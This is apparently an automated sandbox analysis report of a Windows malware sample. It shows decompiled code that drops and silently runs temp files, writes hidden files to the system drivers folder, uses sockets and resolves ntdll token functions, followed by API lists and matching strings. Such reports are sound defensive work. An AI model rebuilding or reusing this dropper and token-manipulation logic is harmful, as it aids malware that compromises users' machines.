                                                                                												 *0x4136ac = _t748;
                                                                                												continue;
                                                                                											}
                                                                                											_t634 = E00407E2F(_t748);
                                                                                											__eflags = _t634;
                                                                                											if(_t634 != 0) {
                                                                                												continue;
                                                                                											}
                                                                                											_v12 =  *0x4136b0;
                                                                                											__eflags =  *0x4121a8; // 0x0
                                                                                											if(__eflags == 0) {
                                                                                												L45:
                                                                                												_t636 = _v12;
                                                                                												 *0x4121a4 =  *(_t636 + 4);
                                                                                												 *0x4122d4 =  *(_t636 + 8);
                                                                                												E00407EAD(_t748, __eflags, 0);
                                                                                												goto L46;
                                                                                											} else {
                                                                                												GetTempPathA(0x120,  &_v408);
                                                                                												_t642 = E00408274( &_v408);
                                                                                												_pop(_t709);
                                                                                												_t782 = _t642;
                                                                                												_t801 = (E0040ECA5() & 0x00000003) + 5;
                                                                                												goto L38;
                                                                                												L38:
                                                                                												__eflags = _t801;
                                                                                												if(_t801 > 0) {
                                                                                													_t644 = E0040ECA5();
                                                                                													_t709 = 0x1a;
                                                                                													_t748 = _t644 % _t709 + 0x61;
                                                                                													 *(_t806 + _t782 - 0x194) = _t748;
                                                                                													_t782 = _t782 + 1;
                                                                                													_t801 = _t801 - 1;
                                                                                													__eflags = _t801;
                                                                                													goto L38;
                                                                                												} else {
                                                                                													E0040EF00(_t806 + _t782 - 0x194, E00402544(0x4122f8, 0x410694, 5, 0xe4, 0xc8));
                                                                                													E0040EE2A(_t709, 0x4122f8, 0, 0x100);
                                                                                													_t811 = _t811 + 0x28;
                                                                                													_t651 = CreateFileA( &_v408, 0x40000000, 0, 0, 2, 0, 0);
                                                                                													_v8 = _t651;
                                                                                													__eflags = _t651 - 0xffffffff;
                                                                                													if(__eflags != 0) {
                                                                                														_t657 = WriteFile(_v8,  &(_v12[0xc]), _v52 + 0xfffffff4,  &_v100, 0);
                                                                                														_push(_v8);
                                                                                														__eflags = _t657;
                                                                                														if(__eflags == 0) {
                                                                                															CloseHandle();
                                                                                														} else {
                                                                                															CloseHandle();
                                                                                															_push(0x4121a8);
                                                                                															_push( &_v408);
                                                                                															wsprintfA( &_v1176, E00402544(0x4122f8, 0x410fe4, 0xc, 0xe4, 0xc8));
                                                                                															E0040EE2A(_t709, 0x4122f8, 0, 0x100);
                                                                                															_t803 = 0x44;
                                                                                															E0040EE2A(_t709,  &_v808, 0, 0x4122f8);
                                                                                															_v808.cb = _t803;
                                                                                															E0040EE2A(_t709,  &_v120, 0, 0x10);
                                                                                															_t811 = _t811 + 0x48;
                                                                                															E00407FCF(_t709);
                                                                                															_t673 = CreateProcessA(0,  &_v1176, 0, 0, 0, 0x8000000, 0, 0,  &_v808,  &_v120);
                                                                                															__eflags = _t673;
                                                                                															if(_t673 != 0) {
                                                                                																WaitForSingleObject(_v120.hProcess, 0xea60);
                                                                                																CloseHandle(_v120.hThread);
                                                                                																CloseHandle(_v120);
                                                                                																_t681 = E0040F04E(0) + 0xe10;
                                                                                																__eflags = _t681;
                                                                                																asm("adc edx, ebx");
                                                                                																_pop(_t709);
                                                                                																 *0x4136a8 = _t681;
                                                                                																 *0x4136ac = _t748;
                                                                                															}
                                                                                															E00407EE6(_t709);
                                                                                															DeleteFileA( &_v408);
                                                                                														}
                                                                                													}
                                                                                													goto L45;
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										L228:
                                                                                										__imp__#3(_v16);
                                                                                										E0040E318();
                                                                                										return _v68;
                                                                                									} else {
                                                                                										__imp__#3(_v16);
                                                                                										goto L21;
                                                                                									}
                                                                                								}
                                                                                								L15:
                                                                                								__imp__#3(_v16);
                                                                                							}
                                                                                							return E0040C8AA(_t829);
                                                                                						} else {
                                                                                							_t805 =  *0x413670;
                                                                                							while(_v12 < _t805) {
                                                                                								asm("cdq");
                                                                                								_t747 = (_t747 + 1) % _t805;
                                                                                								 *0x41367c =  *0x41367c + 1;
                                                                                								_v12 =  &(_v12[1]);
                                                                                								 *0x413674 = _t747;
                                                                                								if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) == 0) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L11;
                                                                                							}
                                                                                							goto L11;
                                                                                						}
                                                                                					}
                                                                                					_t686 = E0040EBCC(0x100000);
                                                                                					 *0x4136b0 = _t686;
                                                                                					if(_t686 == 0) {
                                                                                						goto L21;
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                			}
                                                                                0x0040c921
                                                                                0x0040c924
                                                                                0x0040c92d
                                                                                0x0040c937
                                                                                0x0040c937
                                                                                0x0040c942
                                                                                0x0040cb69
                                                                                0x0040cb69
                                                                                0x00000000
                                                                                0x0040c954
                                                                                0x0040c973
                                                                                0x0040c986
                                                                                0x0040c98b
                                                                                0x0040c990
                                                                                0x0040c993
                                                                                0x0040c99e
                                                                                0x0040c9b8
                                                                                0x0040c9b8
                                                                                0x0040c9be
                                                                                0x0040c9c9
                                                                                0x0040c9d0
                                                                                0x0040c9fd
                                                                                0x0040c9fd
                                                                                0x0040ca00
                                                                                0x0040ca03
                                                                                0x0040ca08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca18
                                                                                0x0040ca1f
                                                                                0x0040ca22
                                                                                0x0040ca24
                                                                                0x0040ca3f
                                                                                0x0040ca44
                                                                                0x0040ca47
                                                                                0x0040ca49
                                                                                0x0040ca5e
                                                                                0x0040ca63
                                                                                0x0040ca6e
                                                                                0x0040ca6f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca71
                                                                                0x0040ca78
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca7a
                                                                                0x0040ca81
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ca95
                                                                                0x0040ca9b
                                                                                0x0040caa1
                                                                                0x0040caa7
                                                                                0x0040cab8
                                                                                0x0040cac2
                                                                                0x0040cac5
                                                                                0x0040cad4
                                                                                0x0040cae7
                                                                                0x0040caf7
                                                                                0x0040cb09
                                                                                0x0040cb27
                                                                                0x0040cb2d
                                                                                0x0040cb37
                                                                                0x0040cb3d
                                                                                0x0040cb47
                                                                                0x0040cb4d
                                                                                0x0040cb54
                                                                                0x0040cb59
                                                                                0x0040cb5c
                                                                                0x0040cb5e
                                                                                0x0040cb70
                                                                                0x0040cb76
                                                                                0x0040cb7c
                                                                                0x0040cb7c
                                                                                0x0040cb7c
                                                                                0x0040cb9e
                                                                                0x0040cba3
                                                                                0x0040cba6
                                                                                0x0040cba9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbaf
                                                                                0x0040cbb1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbb3
                                                                                0x0040cbb6
                                                                                0x0040cbb8
                                                                                0x0040daea
                                                                                0x0040daea
                                                                                0x0040daeb
                                                                                0x0040daf0
                                                                                0x0040daf2
                                                                                0x0040daf5
                                                                                0x0040daf7
                                                                                0x0040dafd
                                                                                0x0040daff
                                                                                0x0040db02
                                                                                0x0040db0b
                                                                                0x0040db1b
                                                                                0x0040db20
                                                                                0x0040db20
                                                                                0x0040db02
                                                                                0x0040dafd
                                                                                0x0040db23
                                                                                0x0040db24
                                                                                0x0040db24
                                                                                0x00000000
                                                                                0x0040db29
                                                                                0x0040cbbe
                                                                                0x0040cbc1
                                                                                0x0040d662
                                                                                0x0040d667
                                                                                0x0040d669
                                                                                0x0040d66c
                                                                                0x0040d66f
                                                                                0x0040d672
                                                                                0x0040d675
                                                                                0x0040d6c7
                                                                                0x0040d6c7
                                                                                0x0040d6cb
                                                                                0x0040d707
                                                                                0x0040d707
                                                                                0x0040d70b
                                                                                0x0040d754
                                                                                0x0040d754
                                                                                0x0040d758
                                                                                0x0040d79e
                                                                                0x0040d79e
                                                                                0x0040d7a2
                                                                                0x0040d8b3
                                                                                0x0040d8b3
                                                                                0x0040d8ba
                                                                                0x0040d93a
                                                                                0x0040d93a
                                                                                0x0040d941
                                                                                0x0040da0e
                                                                                0x0040da0e
                                                                                0x0040da11
                                                                                0x0040da11
                                                                                0x0040da14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da1d
                                                                                0x0040da1d
                                                                                0x0040da23
                                                                                0x0040da25
                                                                                0x0040da90
                                                                                0x0040da90
                                                                                0x0040da94
                                                                                0x0040da9b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040daa1
                                                                                0x0040daa4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dabf
                                                                                0x0040dac2
                                                                                0x0040dac7
                                                                                0x0040daca
                                                                                0x0040dacc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040dacc
                                                                                0x0040da27
                                                                                0x0040da2a
                                                                                0x0040da2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da42
                                                                                0x0040da7d
                                                                                0x0040da7d
                                                                                0x0040da80
                                                                                0x0040da83
                                                                                0x0040da85
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da5f
                                                                                0x0040da64
                                                                                0x0040da67
                                                                                0x0040da69
                                                                                0x0040da89
                                                                                0x00000000
                                                                                0x0040da89
                                                                                0x0040da7a
                                                                                0x0040da7a
                                                                                0x00000000
                                                                                0x0040da87
                                                                                0x00000000
                                                                                0x0040da11
                                                                                0x0040d947
                                                                                0x0040d94c
                                                                                0x0040d94e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d955
                                                                                0x0040d95b
                                                                                0x0040d961
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d967
                                                                                0x0040d975
                                                                                0x0040d975
                                                                                0x0040d97b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d981
                                                                                0x0040d987
                                                                                0x0040d9c9
                                                                                0x0040d9c9
                                                                                0x0040d9ce
                                                                                0x0040d9d0
                                                                                0x0040d9d6
                                                                                0x0040d9d9
                                                                                0x0040d9df
                                                                                0x0040d9f7
                                                                                0x0040d9fe
                                                                                0x0040da03
                                                                                0x0040da06
                                                                                0x0040da08
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040da08
                                                                                0x0040d998
                                                                                0x0040d99a
                                                                                0x0040d99d
                                                                                0x0040d99f
                                                                                0x0040d9ab
                                                                                0x0040d9b4
                                                                                0x0040d9b9
                                                                                0x0040d9be
                                                                                0x0040d9be
                                                                                0x0040d9c1
                                                                                0x0040d9c7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d9c7
                                                                                0x0040d969
                                                                                0x0040d96f
                                                                                0x0040d155
                                                                                0x0040d155
                                                                                0x0040d147
                                                                                0x0040d177
                                                                                0x0040d179
                                                                                0x0040d17c
                                                                                0x0040d33e
                                                                                0x0040d372
                                                                                0x0040d37f
                                                                                0x0040d384
                                                                                0x0040d38a
                                                                                0x0040d38d
                                                                                0x0040d390
                                                                                0x0040d390
                                                                                0x0040d392
                                                                                0x0040d393
                                                                                0x0040d393
                                                                                0x0040d397
                                                                                0x0040d399
                                                                                0x0040d39b
                                                                                0x0040d39d
                                                                                0x0040d3a5
                                                                                0x0040d3a7
                                                                                0x0040d3a7
                                                                                0x0040d3a5
                                                                                0x0040d3bd
                                                                                0x0040d3c3
                                                                                0x0040d3c7
                                                                                0x0040d3d5
                                                                                0x0040d3db
                                                                                0x0040d3dc
                                                                                0x0040d3de
                                                                                0x0040d3ec
                                                                                0x0040d3ec
                                                                                0x0040d3de
                                                                                0x0040d40e
                                                                                0x0040d410
                                                                                0x0040d413
                                                                                0x0040d428
                                                                                0x0040d42f
                                                                                0x0040d435
                                                                                0x0040d439
                                                                                0x0040d447
                                                                                0x0040d44d
                                                                                0x0040d44e
                                                                                0x0040d450
                                                                                0x0040d45b
                                                                                0x0040d45b
                                                                                0x0040d450
                                                                                0x0040d461
                                                                                0x0040d461
                                                                                0x00000000
                                                                                0x0040d182
                                                                                0x0040d195
                                                                                0x0040d19c
                                                                                0x0040d1a2
                                                                                0x0040d1a6
                                                                                0x0040d1b4
                                                                                0x0040d1bb
                                                                                0x0040d1bd
                                                                                0x0040d1c8
                                                                                0x0040d1c8
                                                                                0x0040d1bd
                                                                                0x0040d1da
                                                                                0x0040d1e1
                                                                                0x0040d1e7
                                                                                0x0040d1e8
                                                                                0x0040d1ea
                                                                                0x0040d468
                                                                                0x0040d468
                                                                                0x0040d46b
                                                                                0x0040d47a
                                                                                0x0040d47f
                                                                                0x0040d47f
                                                                                0x0040d482
                                                                                0x0040d485
                                                                                0x0040d48b
                                                                                0x0040d48e
                                                                                0x0040d496
                                                                                0x0040d49b
                                                                                0x0040d4a2
                                                                                0x0040d4ac
                                                                                0x0040d4b1
                                                                                0x0040d4d8
                                                                                0x0040d4de
                                                                                0x0040d4e4
                                                                                0x0040d4e6
                                                                                0x0040d500
                                                                                0x0040d506
                                                                                0x0040d513
                                                                                0x0040d4e8
                                                                                0x0040d4f4
                                                                                0x0040d4fc
                                                                                0x0040d4fc
                                                                                0x0040d4e6
                                                                                0x0040d48e
                                                                                0x00000000
                                                                                0x0040d1f0
                                                                                0x0040d1fd
                                                                                0x0040d231
                                                                                0x0040d23e
                                                                                0x0040d243
                                                                                0x0040d249
                                                                                0x0040d24c
                                                                                0x0040d24f
                                                                                0x0040d24f
                                                                                0x0040d251
                                                                                0x0040d252
                                                                                0x0040d252
                                                                                0x0040d256
                                                                                0x0040d258
                                                                                0x0040d25a
                                                                                0x0040d25c
                                                                                0x0040d264
                                                                                0x0040d266
                                                                                0x0040d266
                                                                                0x0040d264
                                                                                0x0040d27c
                                                                                0x0040d282
                                                                                0x0040d286
                                                                                0x0040d294
                                                                                0x0040d29a
                                                                                0x0040d29b
                                                                                0x0040d29d
                                                                                0x0040d2ab
                                                                                0x0040d2ab
                                                                                0x0040d29d
                                                                                0x0040d2cd
                                                                                0x0040d2cf
                                                                                0x0040d2d2
                                                                                0x0040d2eb
                                                                                0x0040d2f2
                                                                                0x0040d2f8
                                                                                0x0040d2fc
                                                                                0x0040d30e
                                                                                0x0040d314
                                                                                0x0040d315
                                                                                0x0040d317
                                                                                0x0040d326
                                                                                0x0040d326
                                                                                0x0040d317
                                                                                0x0040d2fc
                                                                                0x00000000
                                                                                0x0040d2d2
                                                                                0x0040d1ea
                                                                                0x0040d17c
                                                                                0x0040d08b
                                                                                0x0040d094
                                                                                0x0040d097
                                                                                0x0040d097
                                                                                0x0040d09a
                                                                                0x0040d09d
                                                                                0x0040d0bb
                                                                                0x0040d0bb
                                                                                0x0040d0c2
                                                                                0x0040d0c4
                                                                                0x0040d0c6
                                                                                0x0040d0f4
                                                                                0x0040d0f9
                                                                                0x00000000
                                                                                0x0040d0f9
                                                                                0x0040d0c8
                                                                                0x0040d0ca
                                                                                0x0040d0d3
                                                                                0x0040d0d5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d0d7
                                                                                0x00000000
                                                                                0x0040d0d7
                                                                                0x0040d0cc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d09f
                                                                                0x0040d09f
                                                                                0x0040d09f
                                                                                0x0040d0a8
                                                                                0x0040d0ab
                                                                                0x0040d0ae
                                                                                0x0040d0b5
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x0040d0b6
                                                                                0x00000000
                                                                                0x0040d09f
                                                                                0x0040cf6b
                                                                                0x0040cf72
                                                                                0x0040cf74
                                                                                0x0040cf7a
                                                                                0x0040d013
                                                                                0x0040d013
                                                                                0x0040d015
                                                                                0x0040d01d
                                                                                0x0040d01d
                                                                                0x0040d013
                                                                                0x00000000
                                                                                0x0040cf35
                                                                                0x0040cf35
                                                                                0x0040cf37
                                                                                0x0040cf38
                                                                                0x0040cf3a
                                                                                0x00000000
                                                                                0x0040cf3c
                                                                                0x0040cf3c
                                                                                0x0040cf47
                                                                                0x0040cf4c
                                                                                0x0040cf52
                                                                                0x0040cf55
                                                                                0x00000000
                                                                                0x0040cf55
                                                                                0x0040cf3a
                                                                                0x0040cf2b
                                                                                0x0040ced5
                                                                                0x0040d547
                                                                                0x0040d54e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d554
                                                                                0x0040d557
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d55d
                                                                                0x0040d563
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040d56c
                                                                                0x0040d577
                                                                                0x0040d57d
                                                                                0x0040d583
                                                                                0x0040ce38
                                                                                0x0040ce38
                                                                                0x0040ce38
                                                                                0x0040ce3b
                                                                                0x0040ce3f
                                                                                0x0040ce3f
                                                                                0x0040ce40
                                                                                0x0040ce89
                                                                                0x0040ce90
                                                                                0x0040ce42
                                                                                0x0040ce42
                                                                                0x0040ce42
                                                                                0x0040ce43
                                                                                0x0040ce76
                                                                                0x0040ce7d
                                                                                0x0040ce80
                                                                                0x0040ce45
                                                                                0x0040ce45
                                                                                0x0040ce46
                                                                                0x0040ce56
                                                                                0x0040ce5d
                                                                                0x0040ce60
                                                                                0x0040ce60
                                                                                0x0040ce46
                                                                                0x0040ce43
                                                                                0x0040ce98
                                                                                0x0040ce99
                                                                                0x0040ce9c
                                                                                0x0040ce9c
                                                                                0x00000000
                                                                                0x0040ce3b
                                                                                0x0040ce36
                                                                                0x0040cbe8
                                                                                0x0040cbeb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cbf1
                                                                                0x0040cbf5
                                                                                0x0040cdf2
                                                                                0x0040cdfa
                                                                                0x0040ce04
                                                                                0x0040ce09
                                                                                0x0040ce13
                                                                                0x0040ce16
                                                                                0x0040ce1b
                                                                                0x00000000
                                                                                0x0040ce1b
                                                                                0x0040cbfb
                                                                                0x0040cc00
                                                                                0x0040cc02
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040cc0d
                                                                                0x0040cc10
                                                                                0x0040cc16
                                                                                0x0040cdd2
                                                                                0x0040cdd2
                                                                                0x0040cdd8
                                                                                0x0040cde2
                                                                                0x0040cde7
                                                                                0x00000000
                                                                                0x0040cc1c
                                                                                0x0040cc28
                                                                                0x0040cc35
                                                                                0x0040cc3a
                                                                                0x0040cc3b
                                                                                0x0040cc47
                                                                                0x0040cc4a
                                                                                0x0040cc64
                                                                                0x0040cc64
                                                                                0x0040cc66
                                                                                0x0040cc4c
                                                                                0x0040cc55
                                                                                0x0040cc58
                                                                                0x0040cc5b
                                                                                0x0040cc62
Addresses: 0x0040cc63, 0x0040cc63, 0x00000000, 0x0040cc68, 0x0040cc8d, 0x0040cc9a, 0x0040cc9f, 0x0040ccb4, 0x0040ccba, 0x0040ccbd, 0x0040ccc0, 0x0040ccdc, 0x0040cce2, 0x0040cce5, 0x0040cce7, 0x0040cdcc, 0x0040cced, 0x0040cced, 0x0040ccf3, 0x0040ccfe, 0x0040cd21, 0x0040cd2a, 0x0040cd31, 0x0040cd3b, 0x0040cd47, 0x0040cd4d, 0x0040cd52, 0x0040cd55, 0x0040cd77, 0x0040cd7d, 0x0040cd7f, 0x0040cd89, 0x0040cd98, 0x0040cd9d, 0x0040cda5, 0x0040cda5, 0x0040cdaa, 0x0040cdac, 0x0040cdad, 0x0040cdb2, 0x0040cdb2, 0x0040cdb8, 0x0040cdc4, 0x0040cdc4, 0x0040cce7, 0x00000000, 0x0040ccc0, 0x0040cc66, 0x0040cc16, 0x0040dad2, 0x0040dad5, 0x0040dadb, 0x00000000, 0x0040cb60, 0x0040cb63, 0x00000000, 0x0040cb63, 0x0040cb5e, 0x0040ca4b, 0x0040ca4e, 0x0040ca4e, 0x00000000, 0x0040c9d2, 0x0040c9d2, 0x0040c9d8, 0x0040c9e0, 0x0040c9e1, 0x0040c9e3, 0x0040c9e9, 0x0040c9f1, 0x0040c9fb, 0x00000000, 0x00000000, 0x00000000, 0x0040c9fb, 0x00000000, 0x0040c9d8, 0x0040c9d0, 0x0040c9a5, 0x0040c9ab, 0x0040c9b2, 0x00000000, 0x00000000, 0x00000000, 0x0040c9b2

APIs
• closesocket.WS2_32(?), ref: 0040CA4E
• closesocket.WS2_32(?), ref: 0040CB63
• GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
• WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
• CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
• wsprintfA.USER32 ref: 0040CD21
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
• WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
• CloseHandle.KERNEL32(?), ref: 0040CD98
• CloseHandle.KERNEL32(?), ref: 0040CD9D
• DeleteFileA.KERNEL32(?), ref: 0040CDC4
• CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
• GetSystemDirectoryA.KERNEL32 ref: 0040CFEF
• GetSystemDirectoryA.KERNEL32 ref: 0040D033
• lstrcatA.KERNEL32(?,?), ref: 0040D10C
• SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
• CloseHandle.KERNEL32(00000000), ref: 0040D19C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
• lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
• SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
• SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
• lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
• SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
• CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
• WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
• SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
• CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
• DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
• closesocket.WS2_32(?), ref: 0040D56C
• Sleep.KERNEL32(000003E8), ref: 0040D577
• ExitProcess.KERNEL32 ref: 0040D583
• wsprintfA.USER32 ref: 0040D81F
  • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
• closesocket.WS2_32(?), ref: 0040DAD5
Strings
Memory Dump Source
• Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Yara matches
Similarity
• API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
• String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
• API String ID: 562065436-3791576231
• Opcode ID: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
• Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
• Opcode Fuzzy Hash: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
• Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Decompiled by the sandbox: resolves ntdll exports at run time via
   LoadLibraryA/GetProcAddress and caches them in globals at 0x413918..0x413954.
   Returns 1 when all pointers are already cached, a negative count when a
   lookup fails, and 0 when ntdll.dll cannot be loaded. */
E00401000() {
	struct HINSTANCE__* _t2;
	_Unknown_base(*)()* _t3;
	signed int _t4;
	_Unknown_base(*)()* _t6;
	_Unknown_base(*)()* _t7;
	_Unknown_base(*)()* _t8;
	_Unknown_base(*)()* _t10;
	_Unknown_base(*)()* _t11;
	_Unknown_base(*)()* _t12;
	_Unknown_base(*)()* _t14;
	_Unknown_base(*)()* _t15;
	_Unknown_base(*)()* _t16;
	_Unknown_base(*)()* _t18;
	_Unknown_base(*)()* _t19;
	_Unknown_base(*)()* _t20;
	_Unknown_base(*)()* _t22;
	_Unknown_base(*)()* _t23;
	signed int _t34;
	signed int _t35;

	_t2 =  *0x413918; /* cached HMODULE of ntdll.dll */
	_t35 = _t34 | 0xffffffff;
	if(_t2 != 0) {
		L3:
		/* only re-resolve if any cached export pointer is still empty */
		if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
			_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
			 *0x41391c = _t3;
			if(_t3 == 0) {
				L34:
				_t4 = _t35;
			} else {
				_t35 = 0xfffffffe;
				_t6 = GetProcAddress( *0x413918, "RtlSetLastWin32Error");
				 *0x413920 = _t6;
				if(_t6 == 0) {
					goto L34;
				} else {
					_t35 = 0xfffffffd;
					_t7 = GetProcAddress( *0x413918, "NtTerminateProcess");
					 *0x413924 = _t7;
					if(_t7 == 0) {
						goto L34;
					} else {
						_t35 = 0xfffffffc;
						_t8 = GetProcAddress( *0x413918, "RtlFreeSid");
						 *0x413928 = _t8;
						if(_t8 == 0) {
							goto L34;
						} else {
							_t35 = 0xfffffffb;
							_t10 = GetProcAddress( *0x413918, "RtlInitUnicodeString");
							 *0x41392c = _t10;
							if(_t10 == 0) {
								goto L34;
							} else {
								_t35 = 0xfffffffa;
								_t11 = GetProcAddress( *0x413918, "NtSetInformationThread");
								 *0x413930 = _t11;
								if(_t11 == 0) {
									goto L34;
								} else {
									_t35 = 0xfffffff9;
									_t12 = GetProcAddress( *0x413918, "NtSetInformationToken");
									 *0x413934 = _t12;
									if(_t12 == 0) {
										goto L34;
									} else {
										_t35 = 0xfffffff8;
										_t14 = GetProcAddress( *0x413918, "RtlNtStatusToDosError");
										 *0x413938 = _t14;
										if(_t14 == 0) {
											goto L34;
										} else {
											_t35 = 0xfffffff7;
											_t15 = GetProcAddress( *0x413918, "NtClose");
											 *0x41393c = _t15;
											if(_t15 == 0) {
												goto L34;
											} else {
												_t35 = 0xfffffff6;
												_t16 = GetProcAddress( *0x413918, "NtOpenProcessToken");
												 *0x413940 = _t16;
												if(_t16 == 0) {
													goto L34;
												} else {
													_t35 = 0xfffffff5;
													_t18 = GetProcAddress( *0x413918, "NtDuplicateToken");
													 *0x413944 = _t18;
													if(_t18 == 0) {
														goto L34;
													} else {
														_t35 = 0xfffffff4;
														_t19 = GetProcAddress( *0x413918, "RtlAllocateAndInitializeSid");
														 *0x413948 = _t19;
														if(_t19 == 0) {
															goto L34;
														} else {
															_t35 = 0xfffffff3;
															_t20 = GetProcAddress( *0x413918, "NtFilterToken");
															 *0x41394c = _t20;
															if(_t20 == 0) {
																goto L34;
															} else {
																_t35 = 0xfffffff2;
																_t22 = GetProcAddress( *0x413918, "RtlLengthSid");
																 *0x413950 = _t22;
																if(_t22 == 0) {
																	goto L34;
																} else {
																	_t35 = 0xfffffff1;
																	_t23 = GetProcAddress( *0x413918, "NtQueryInformationToken");
																	 *0x413954 = _t23;
																	_t1 = _t35 + 0x10; // 0x100000001
																	_t4 = _t1;
																	if(_t23 == 0) {
																		goto L34;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}
			return _t4;
		} else {
			return 1;
		}
	} else {
		_t2 = LoadLibraryA("ntdll.dll");
		 *0x413918 = _t2;
		if(_t2 != 0) {
			goto L3;
		} else {
			return _t2;
		}
	}
}

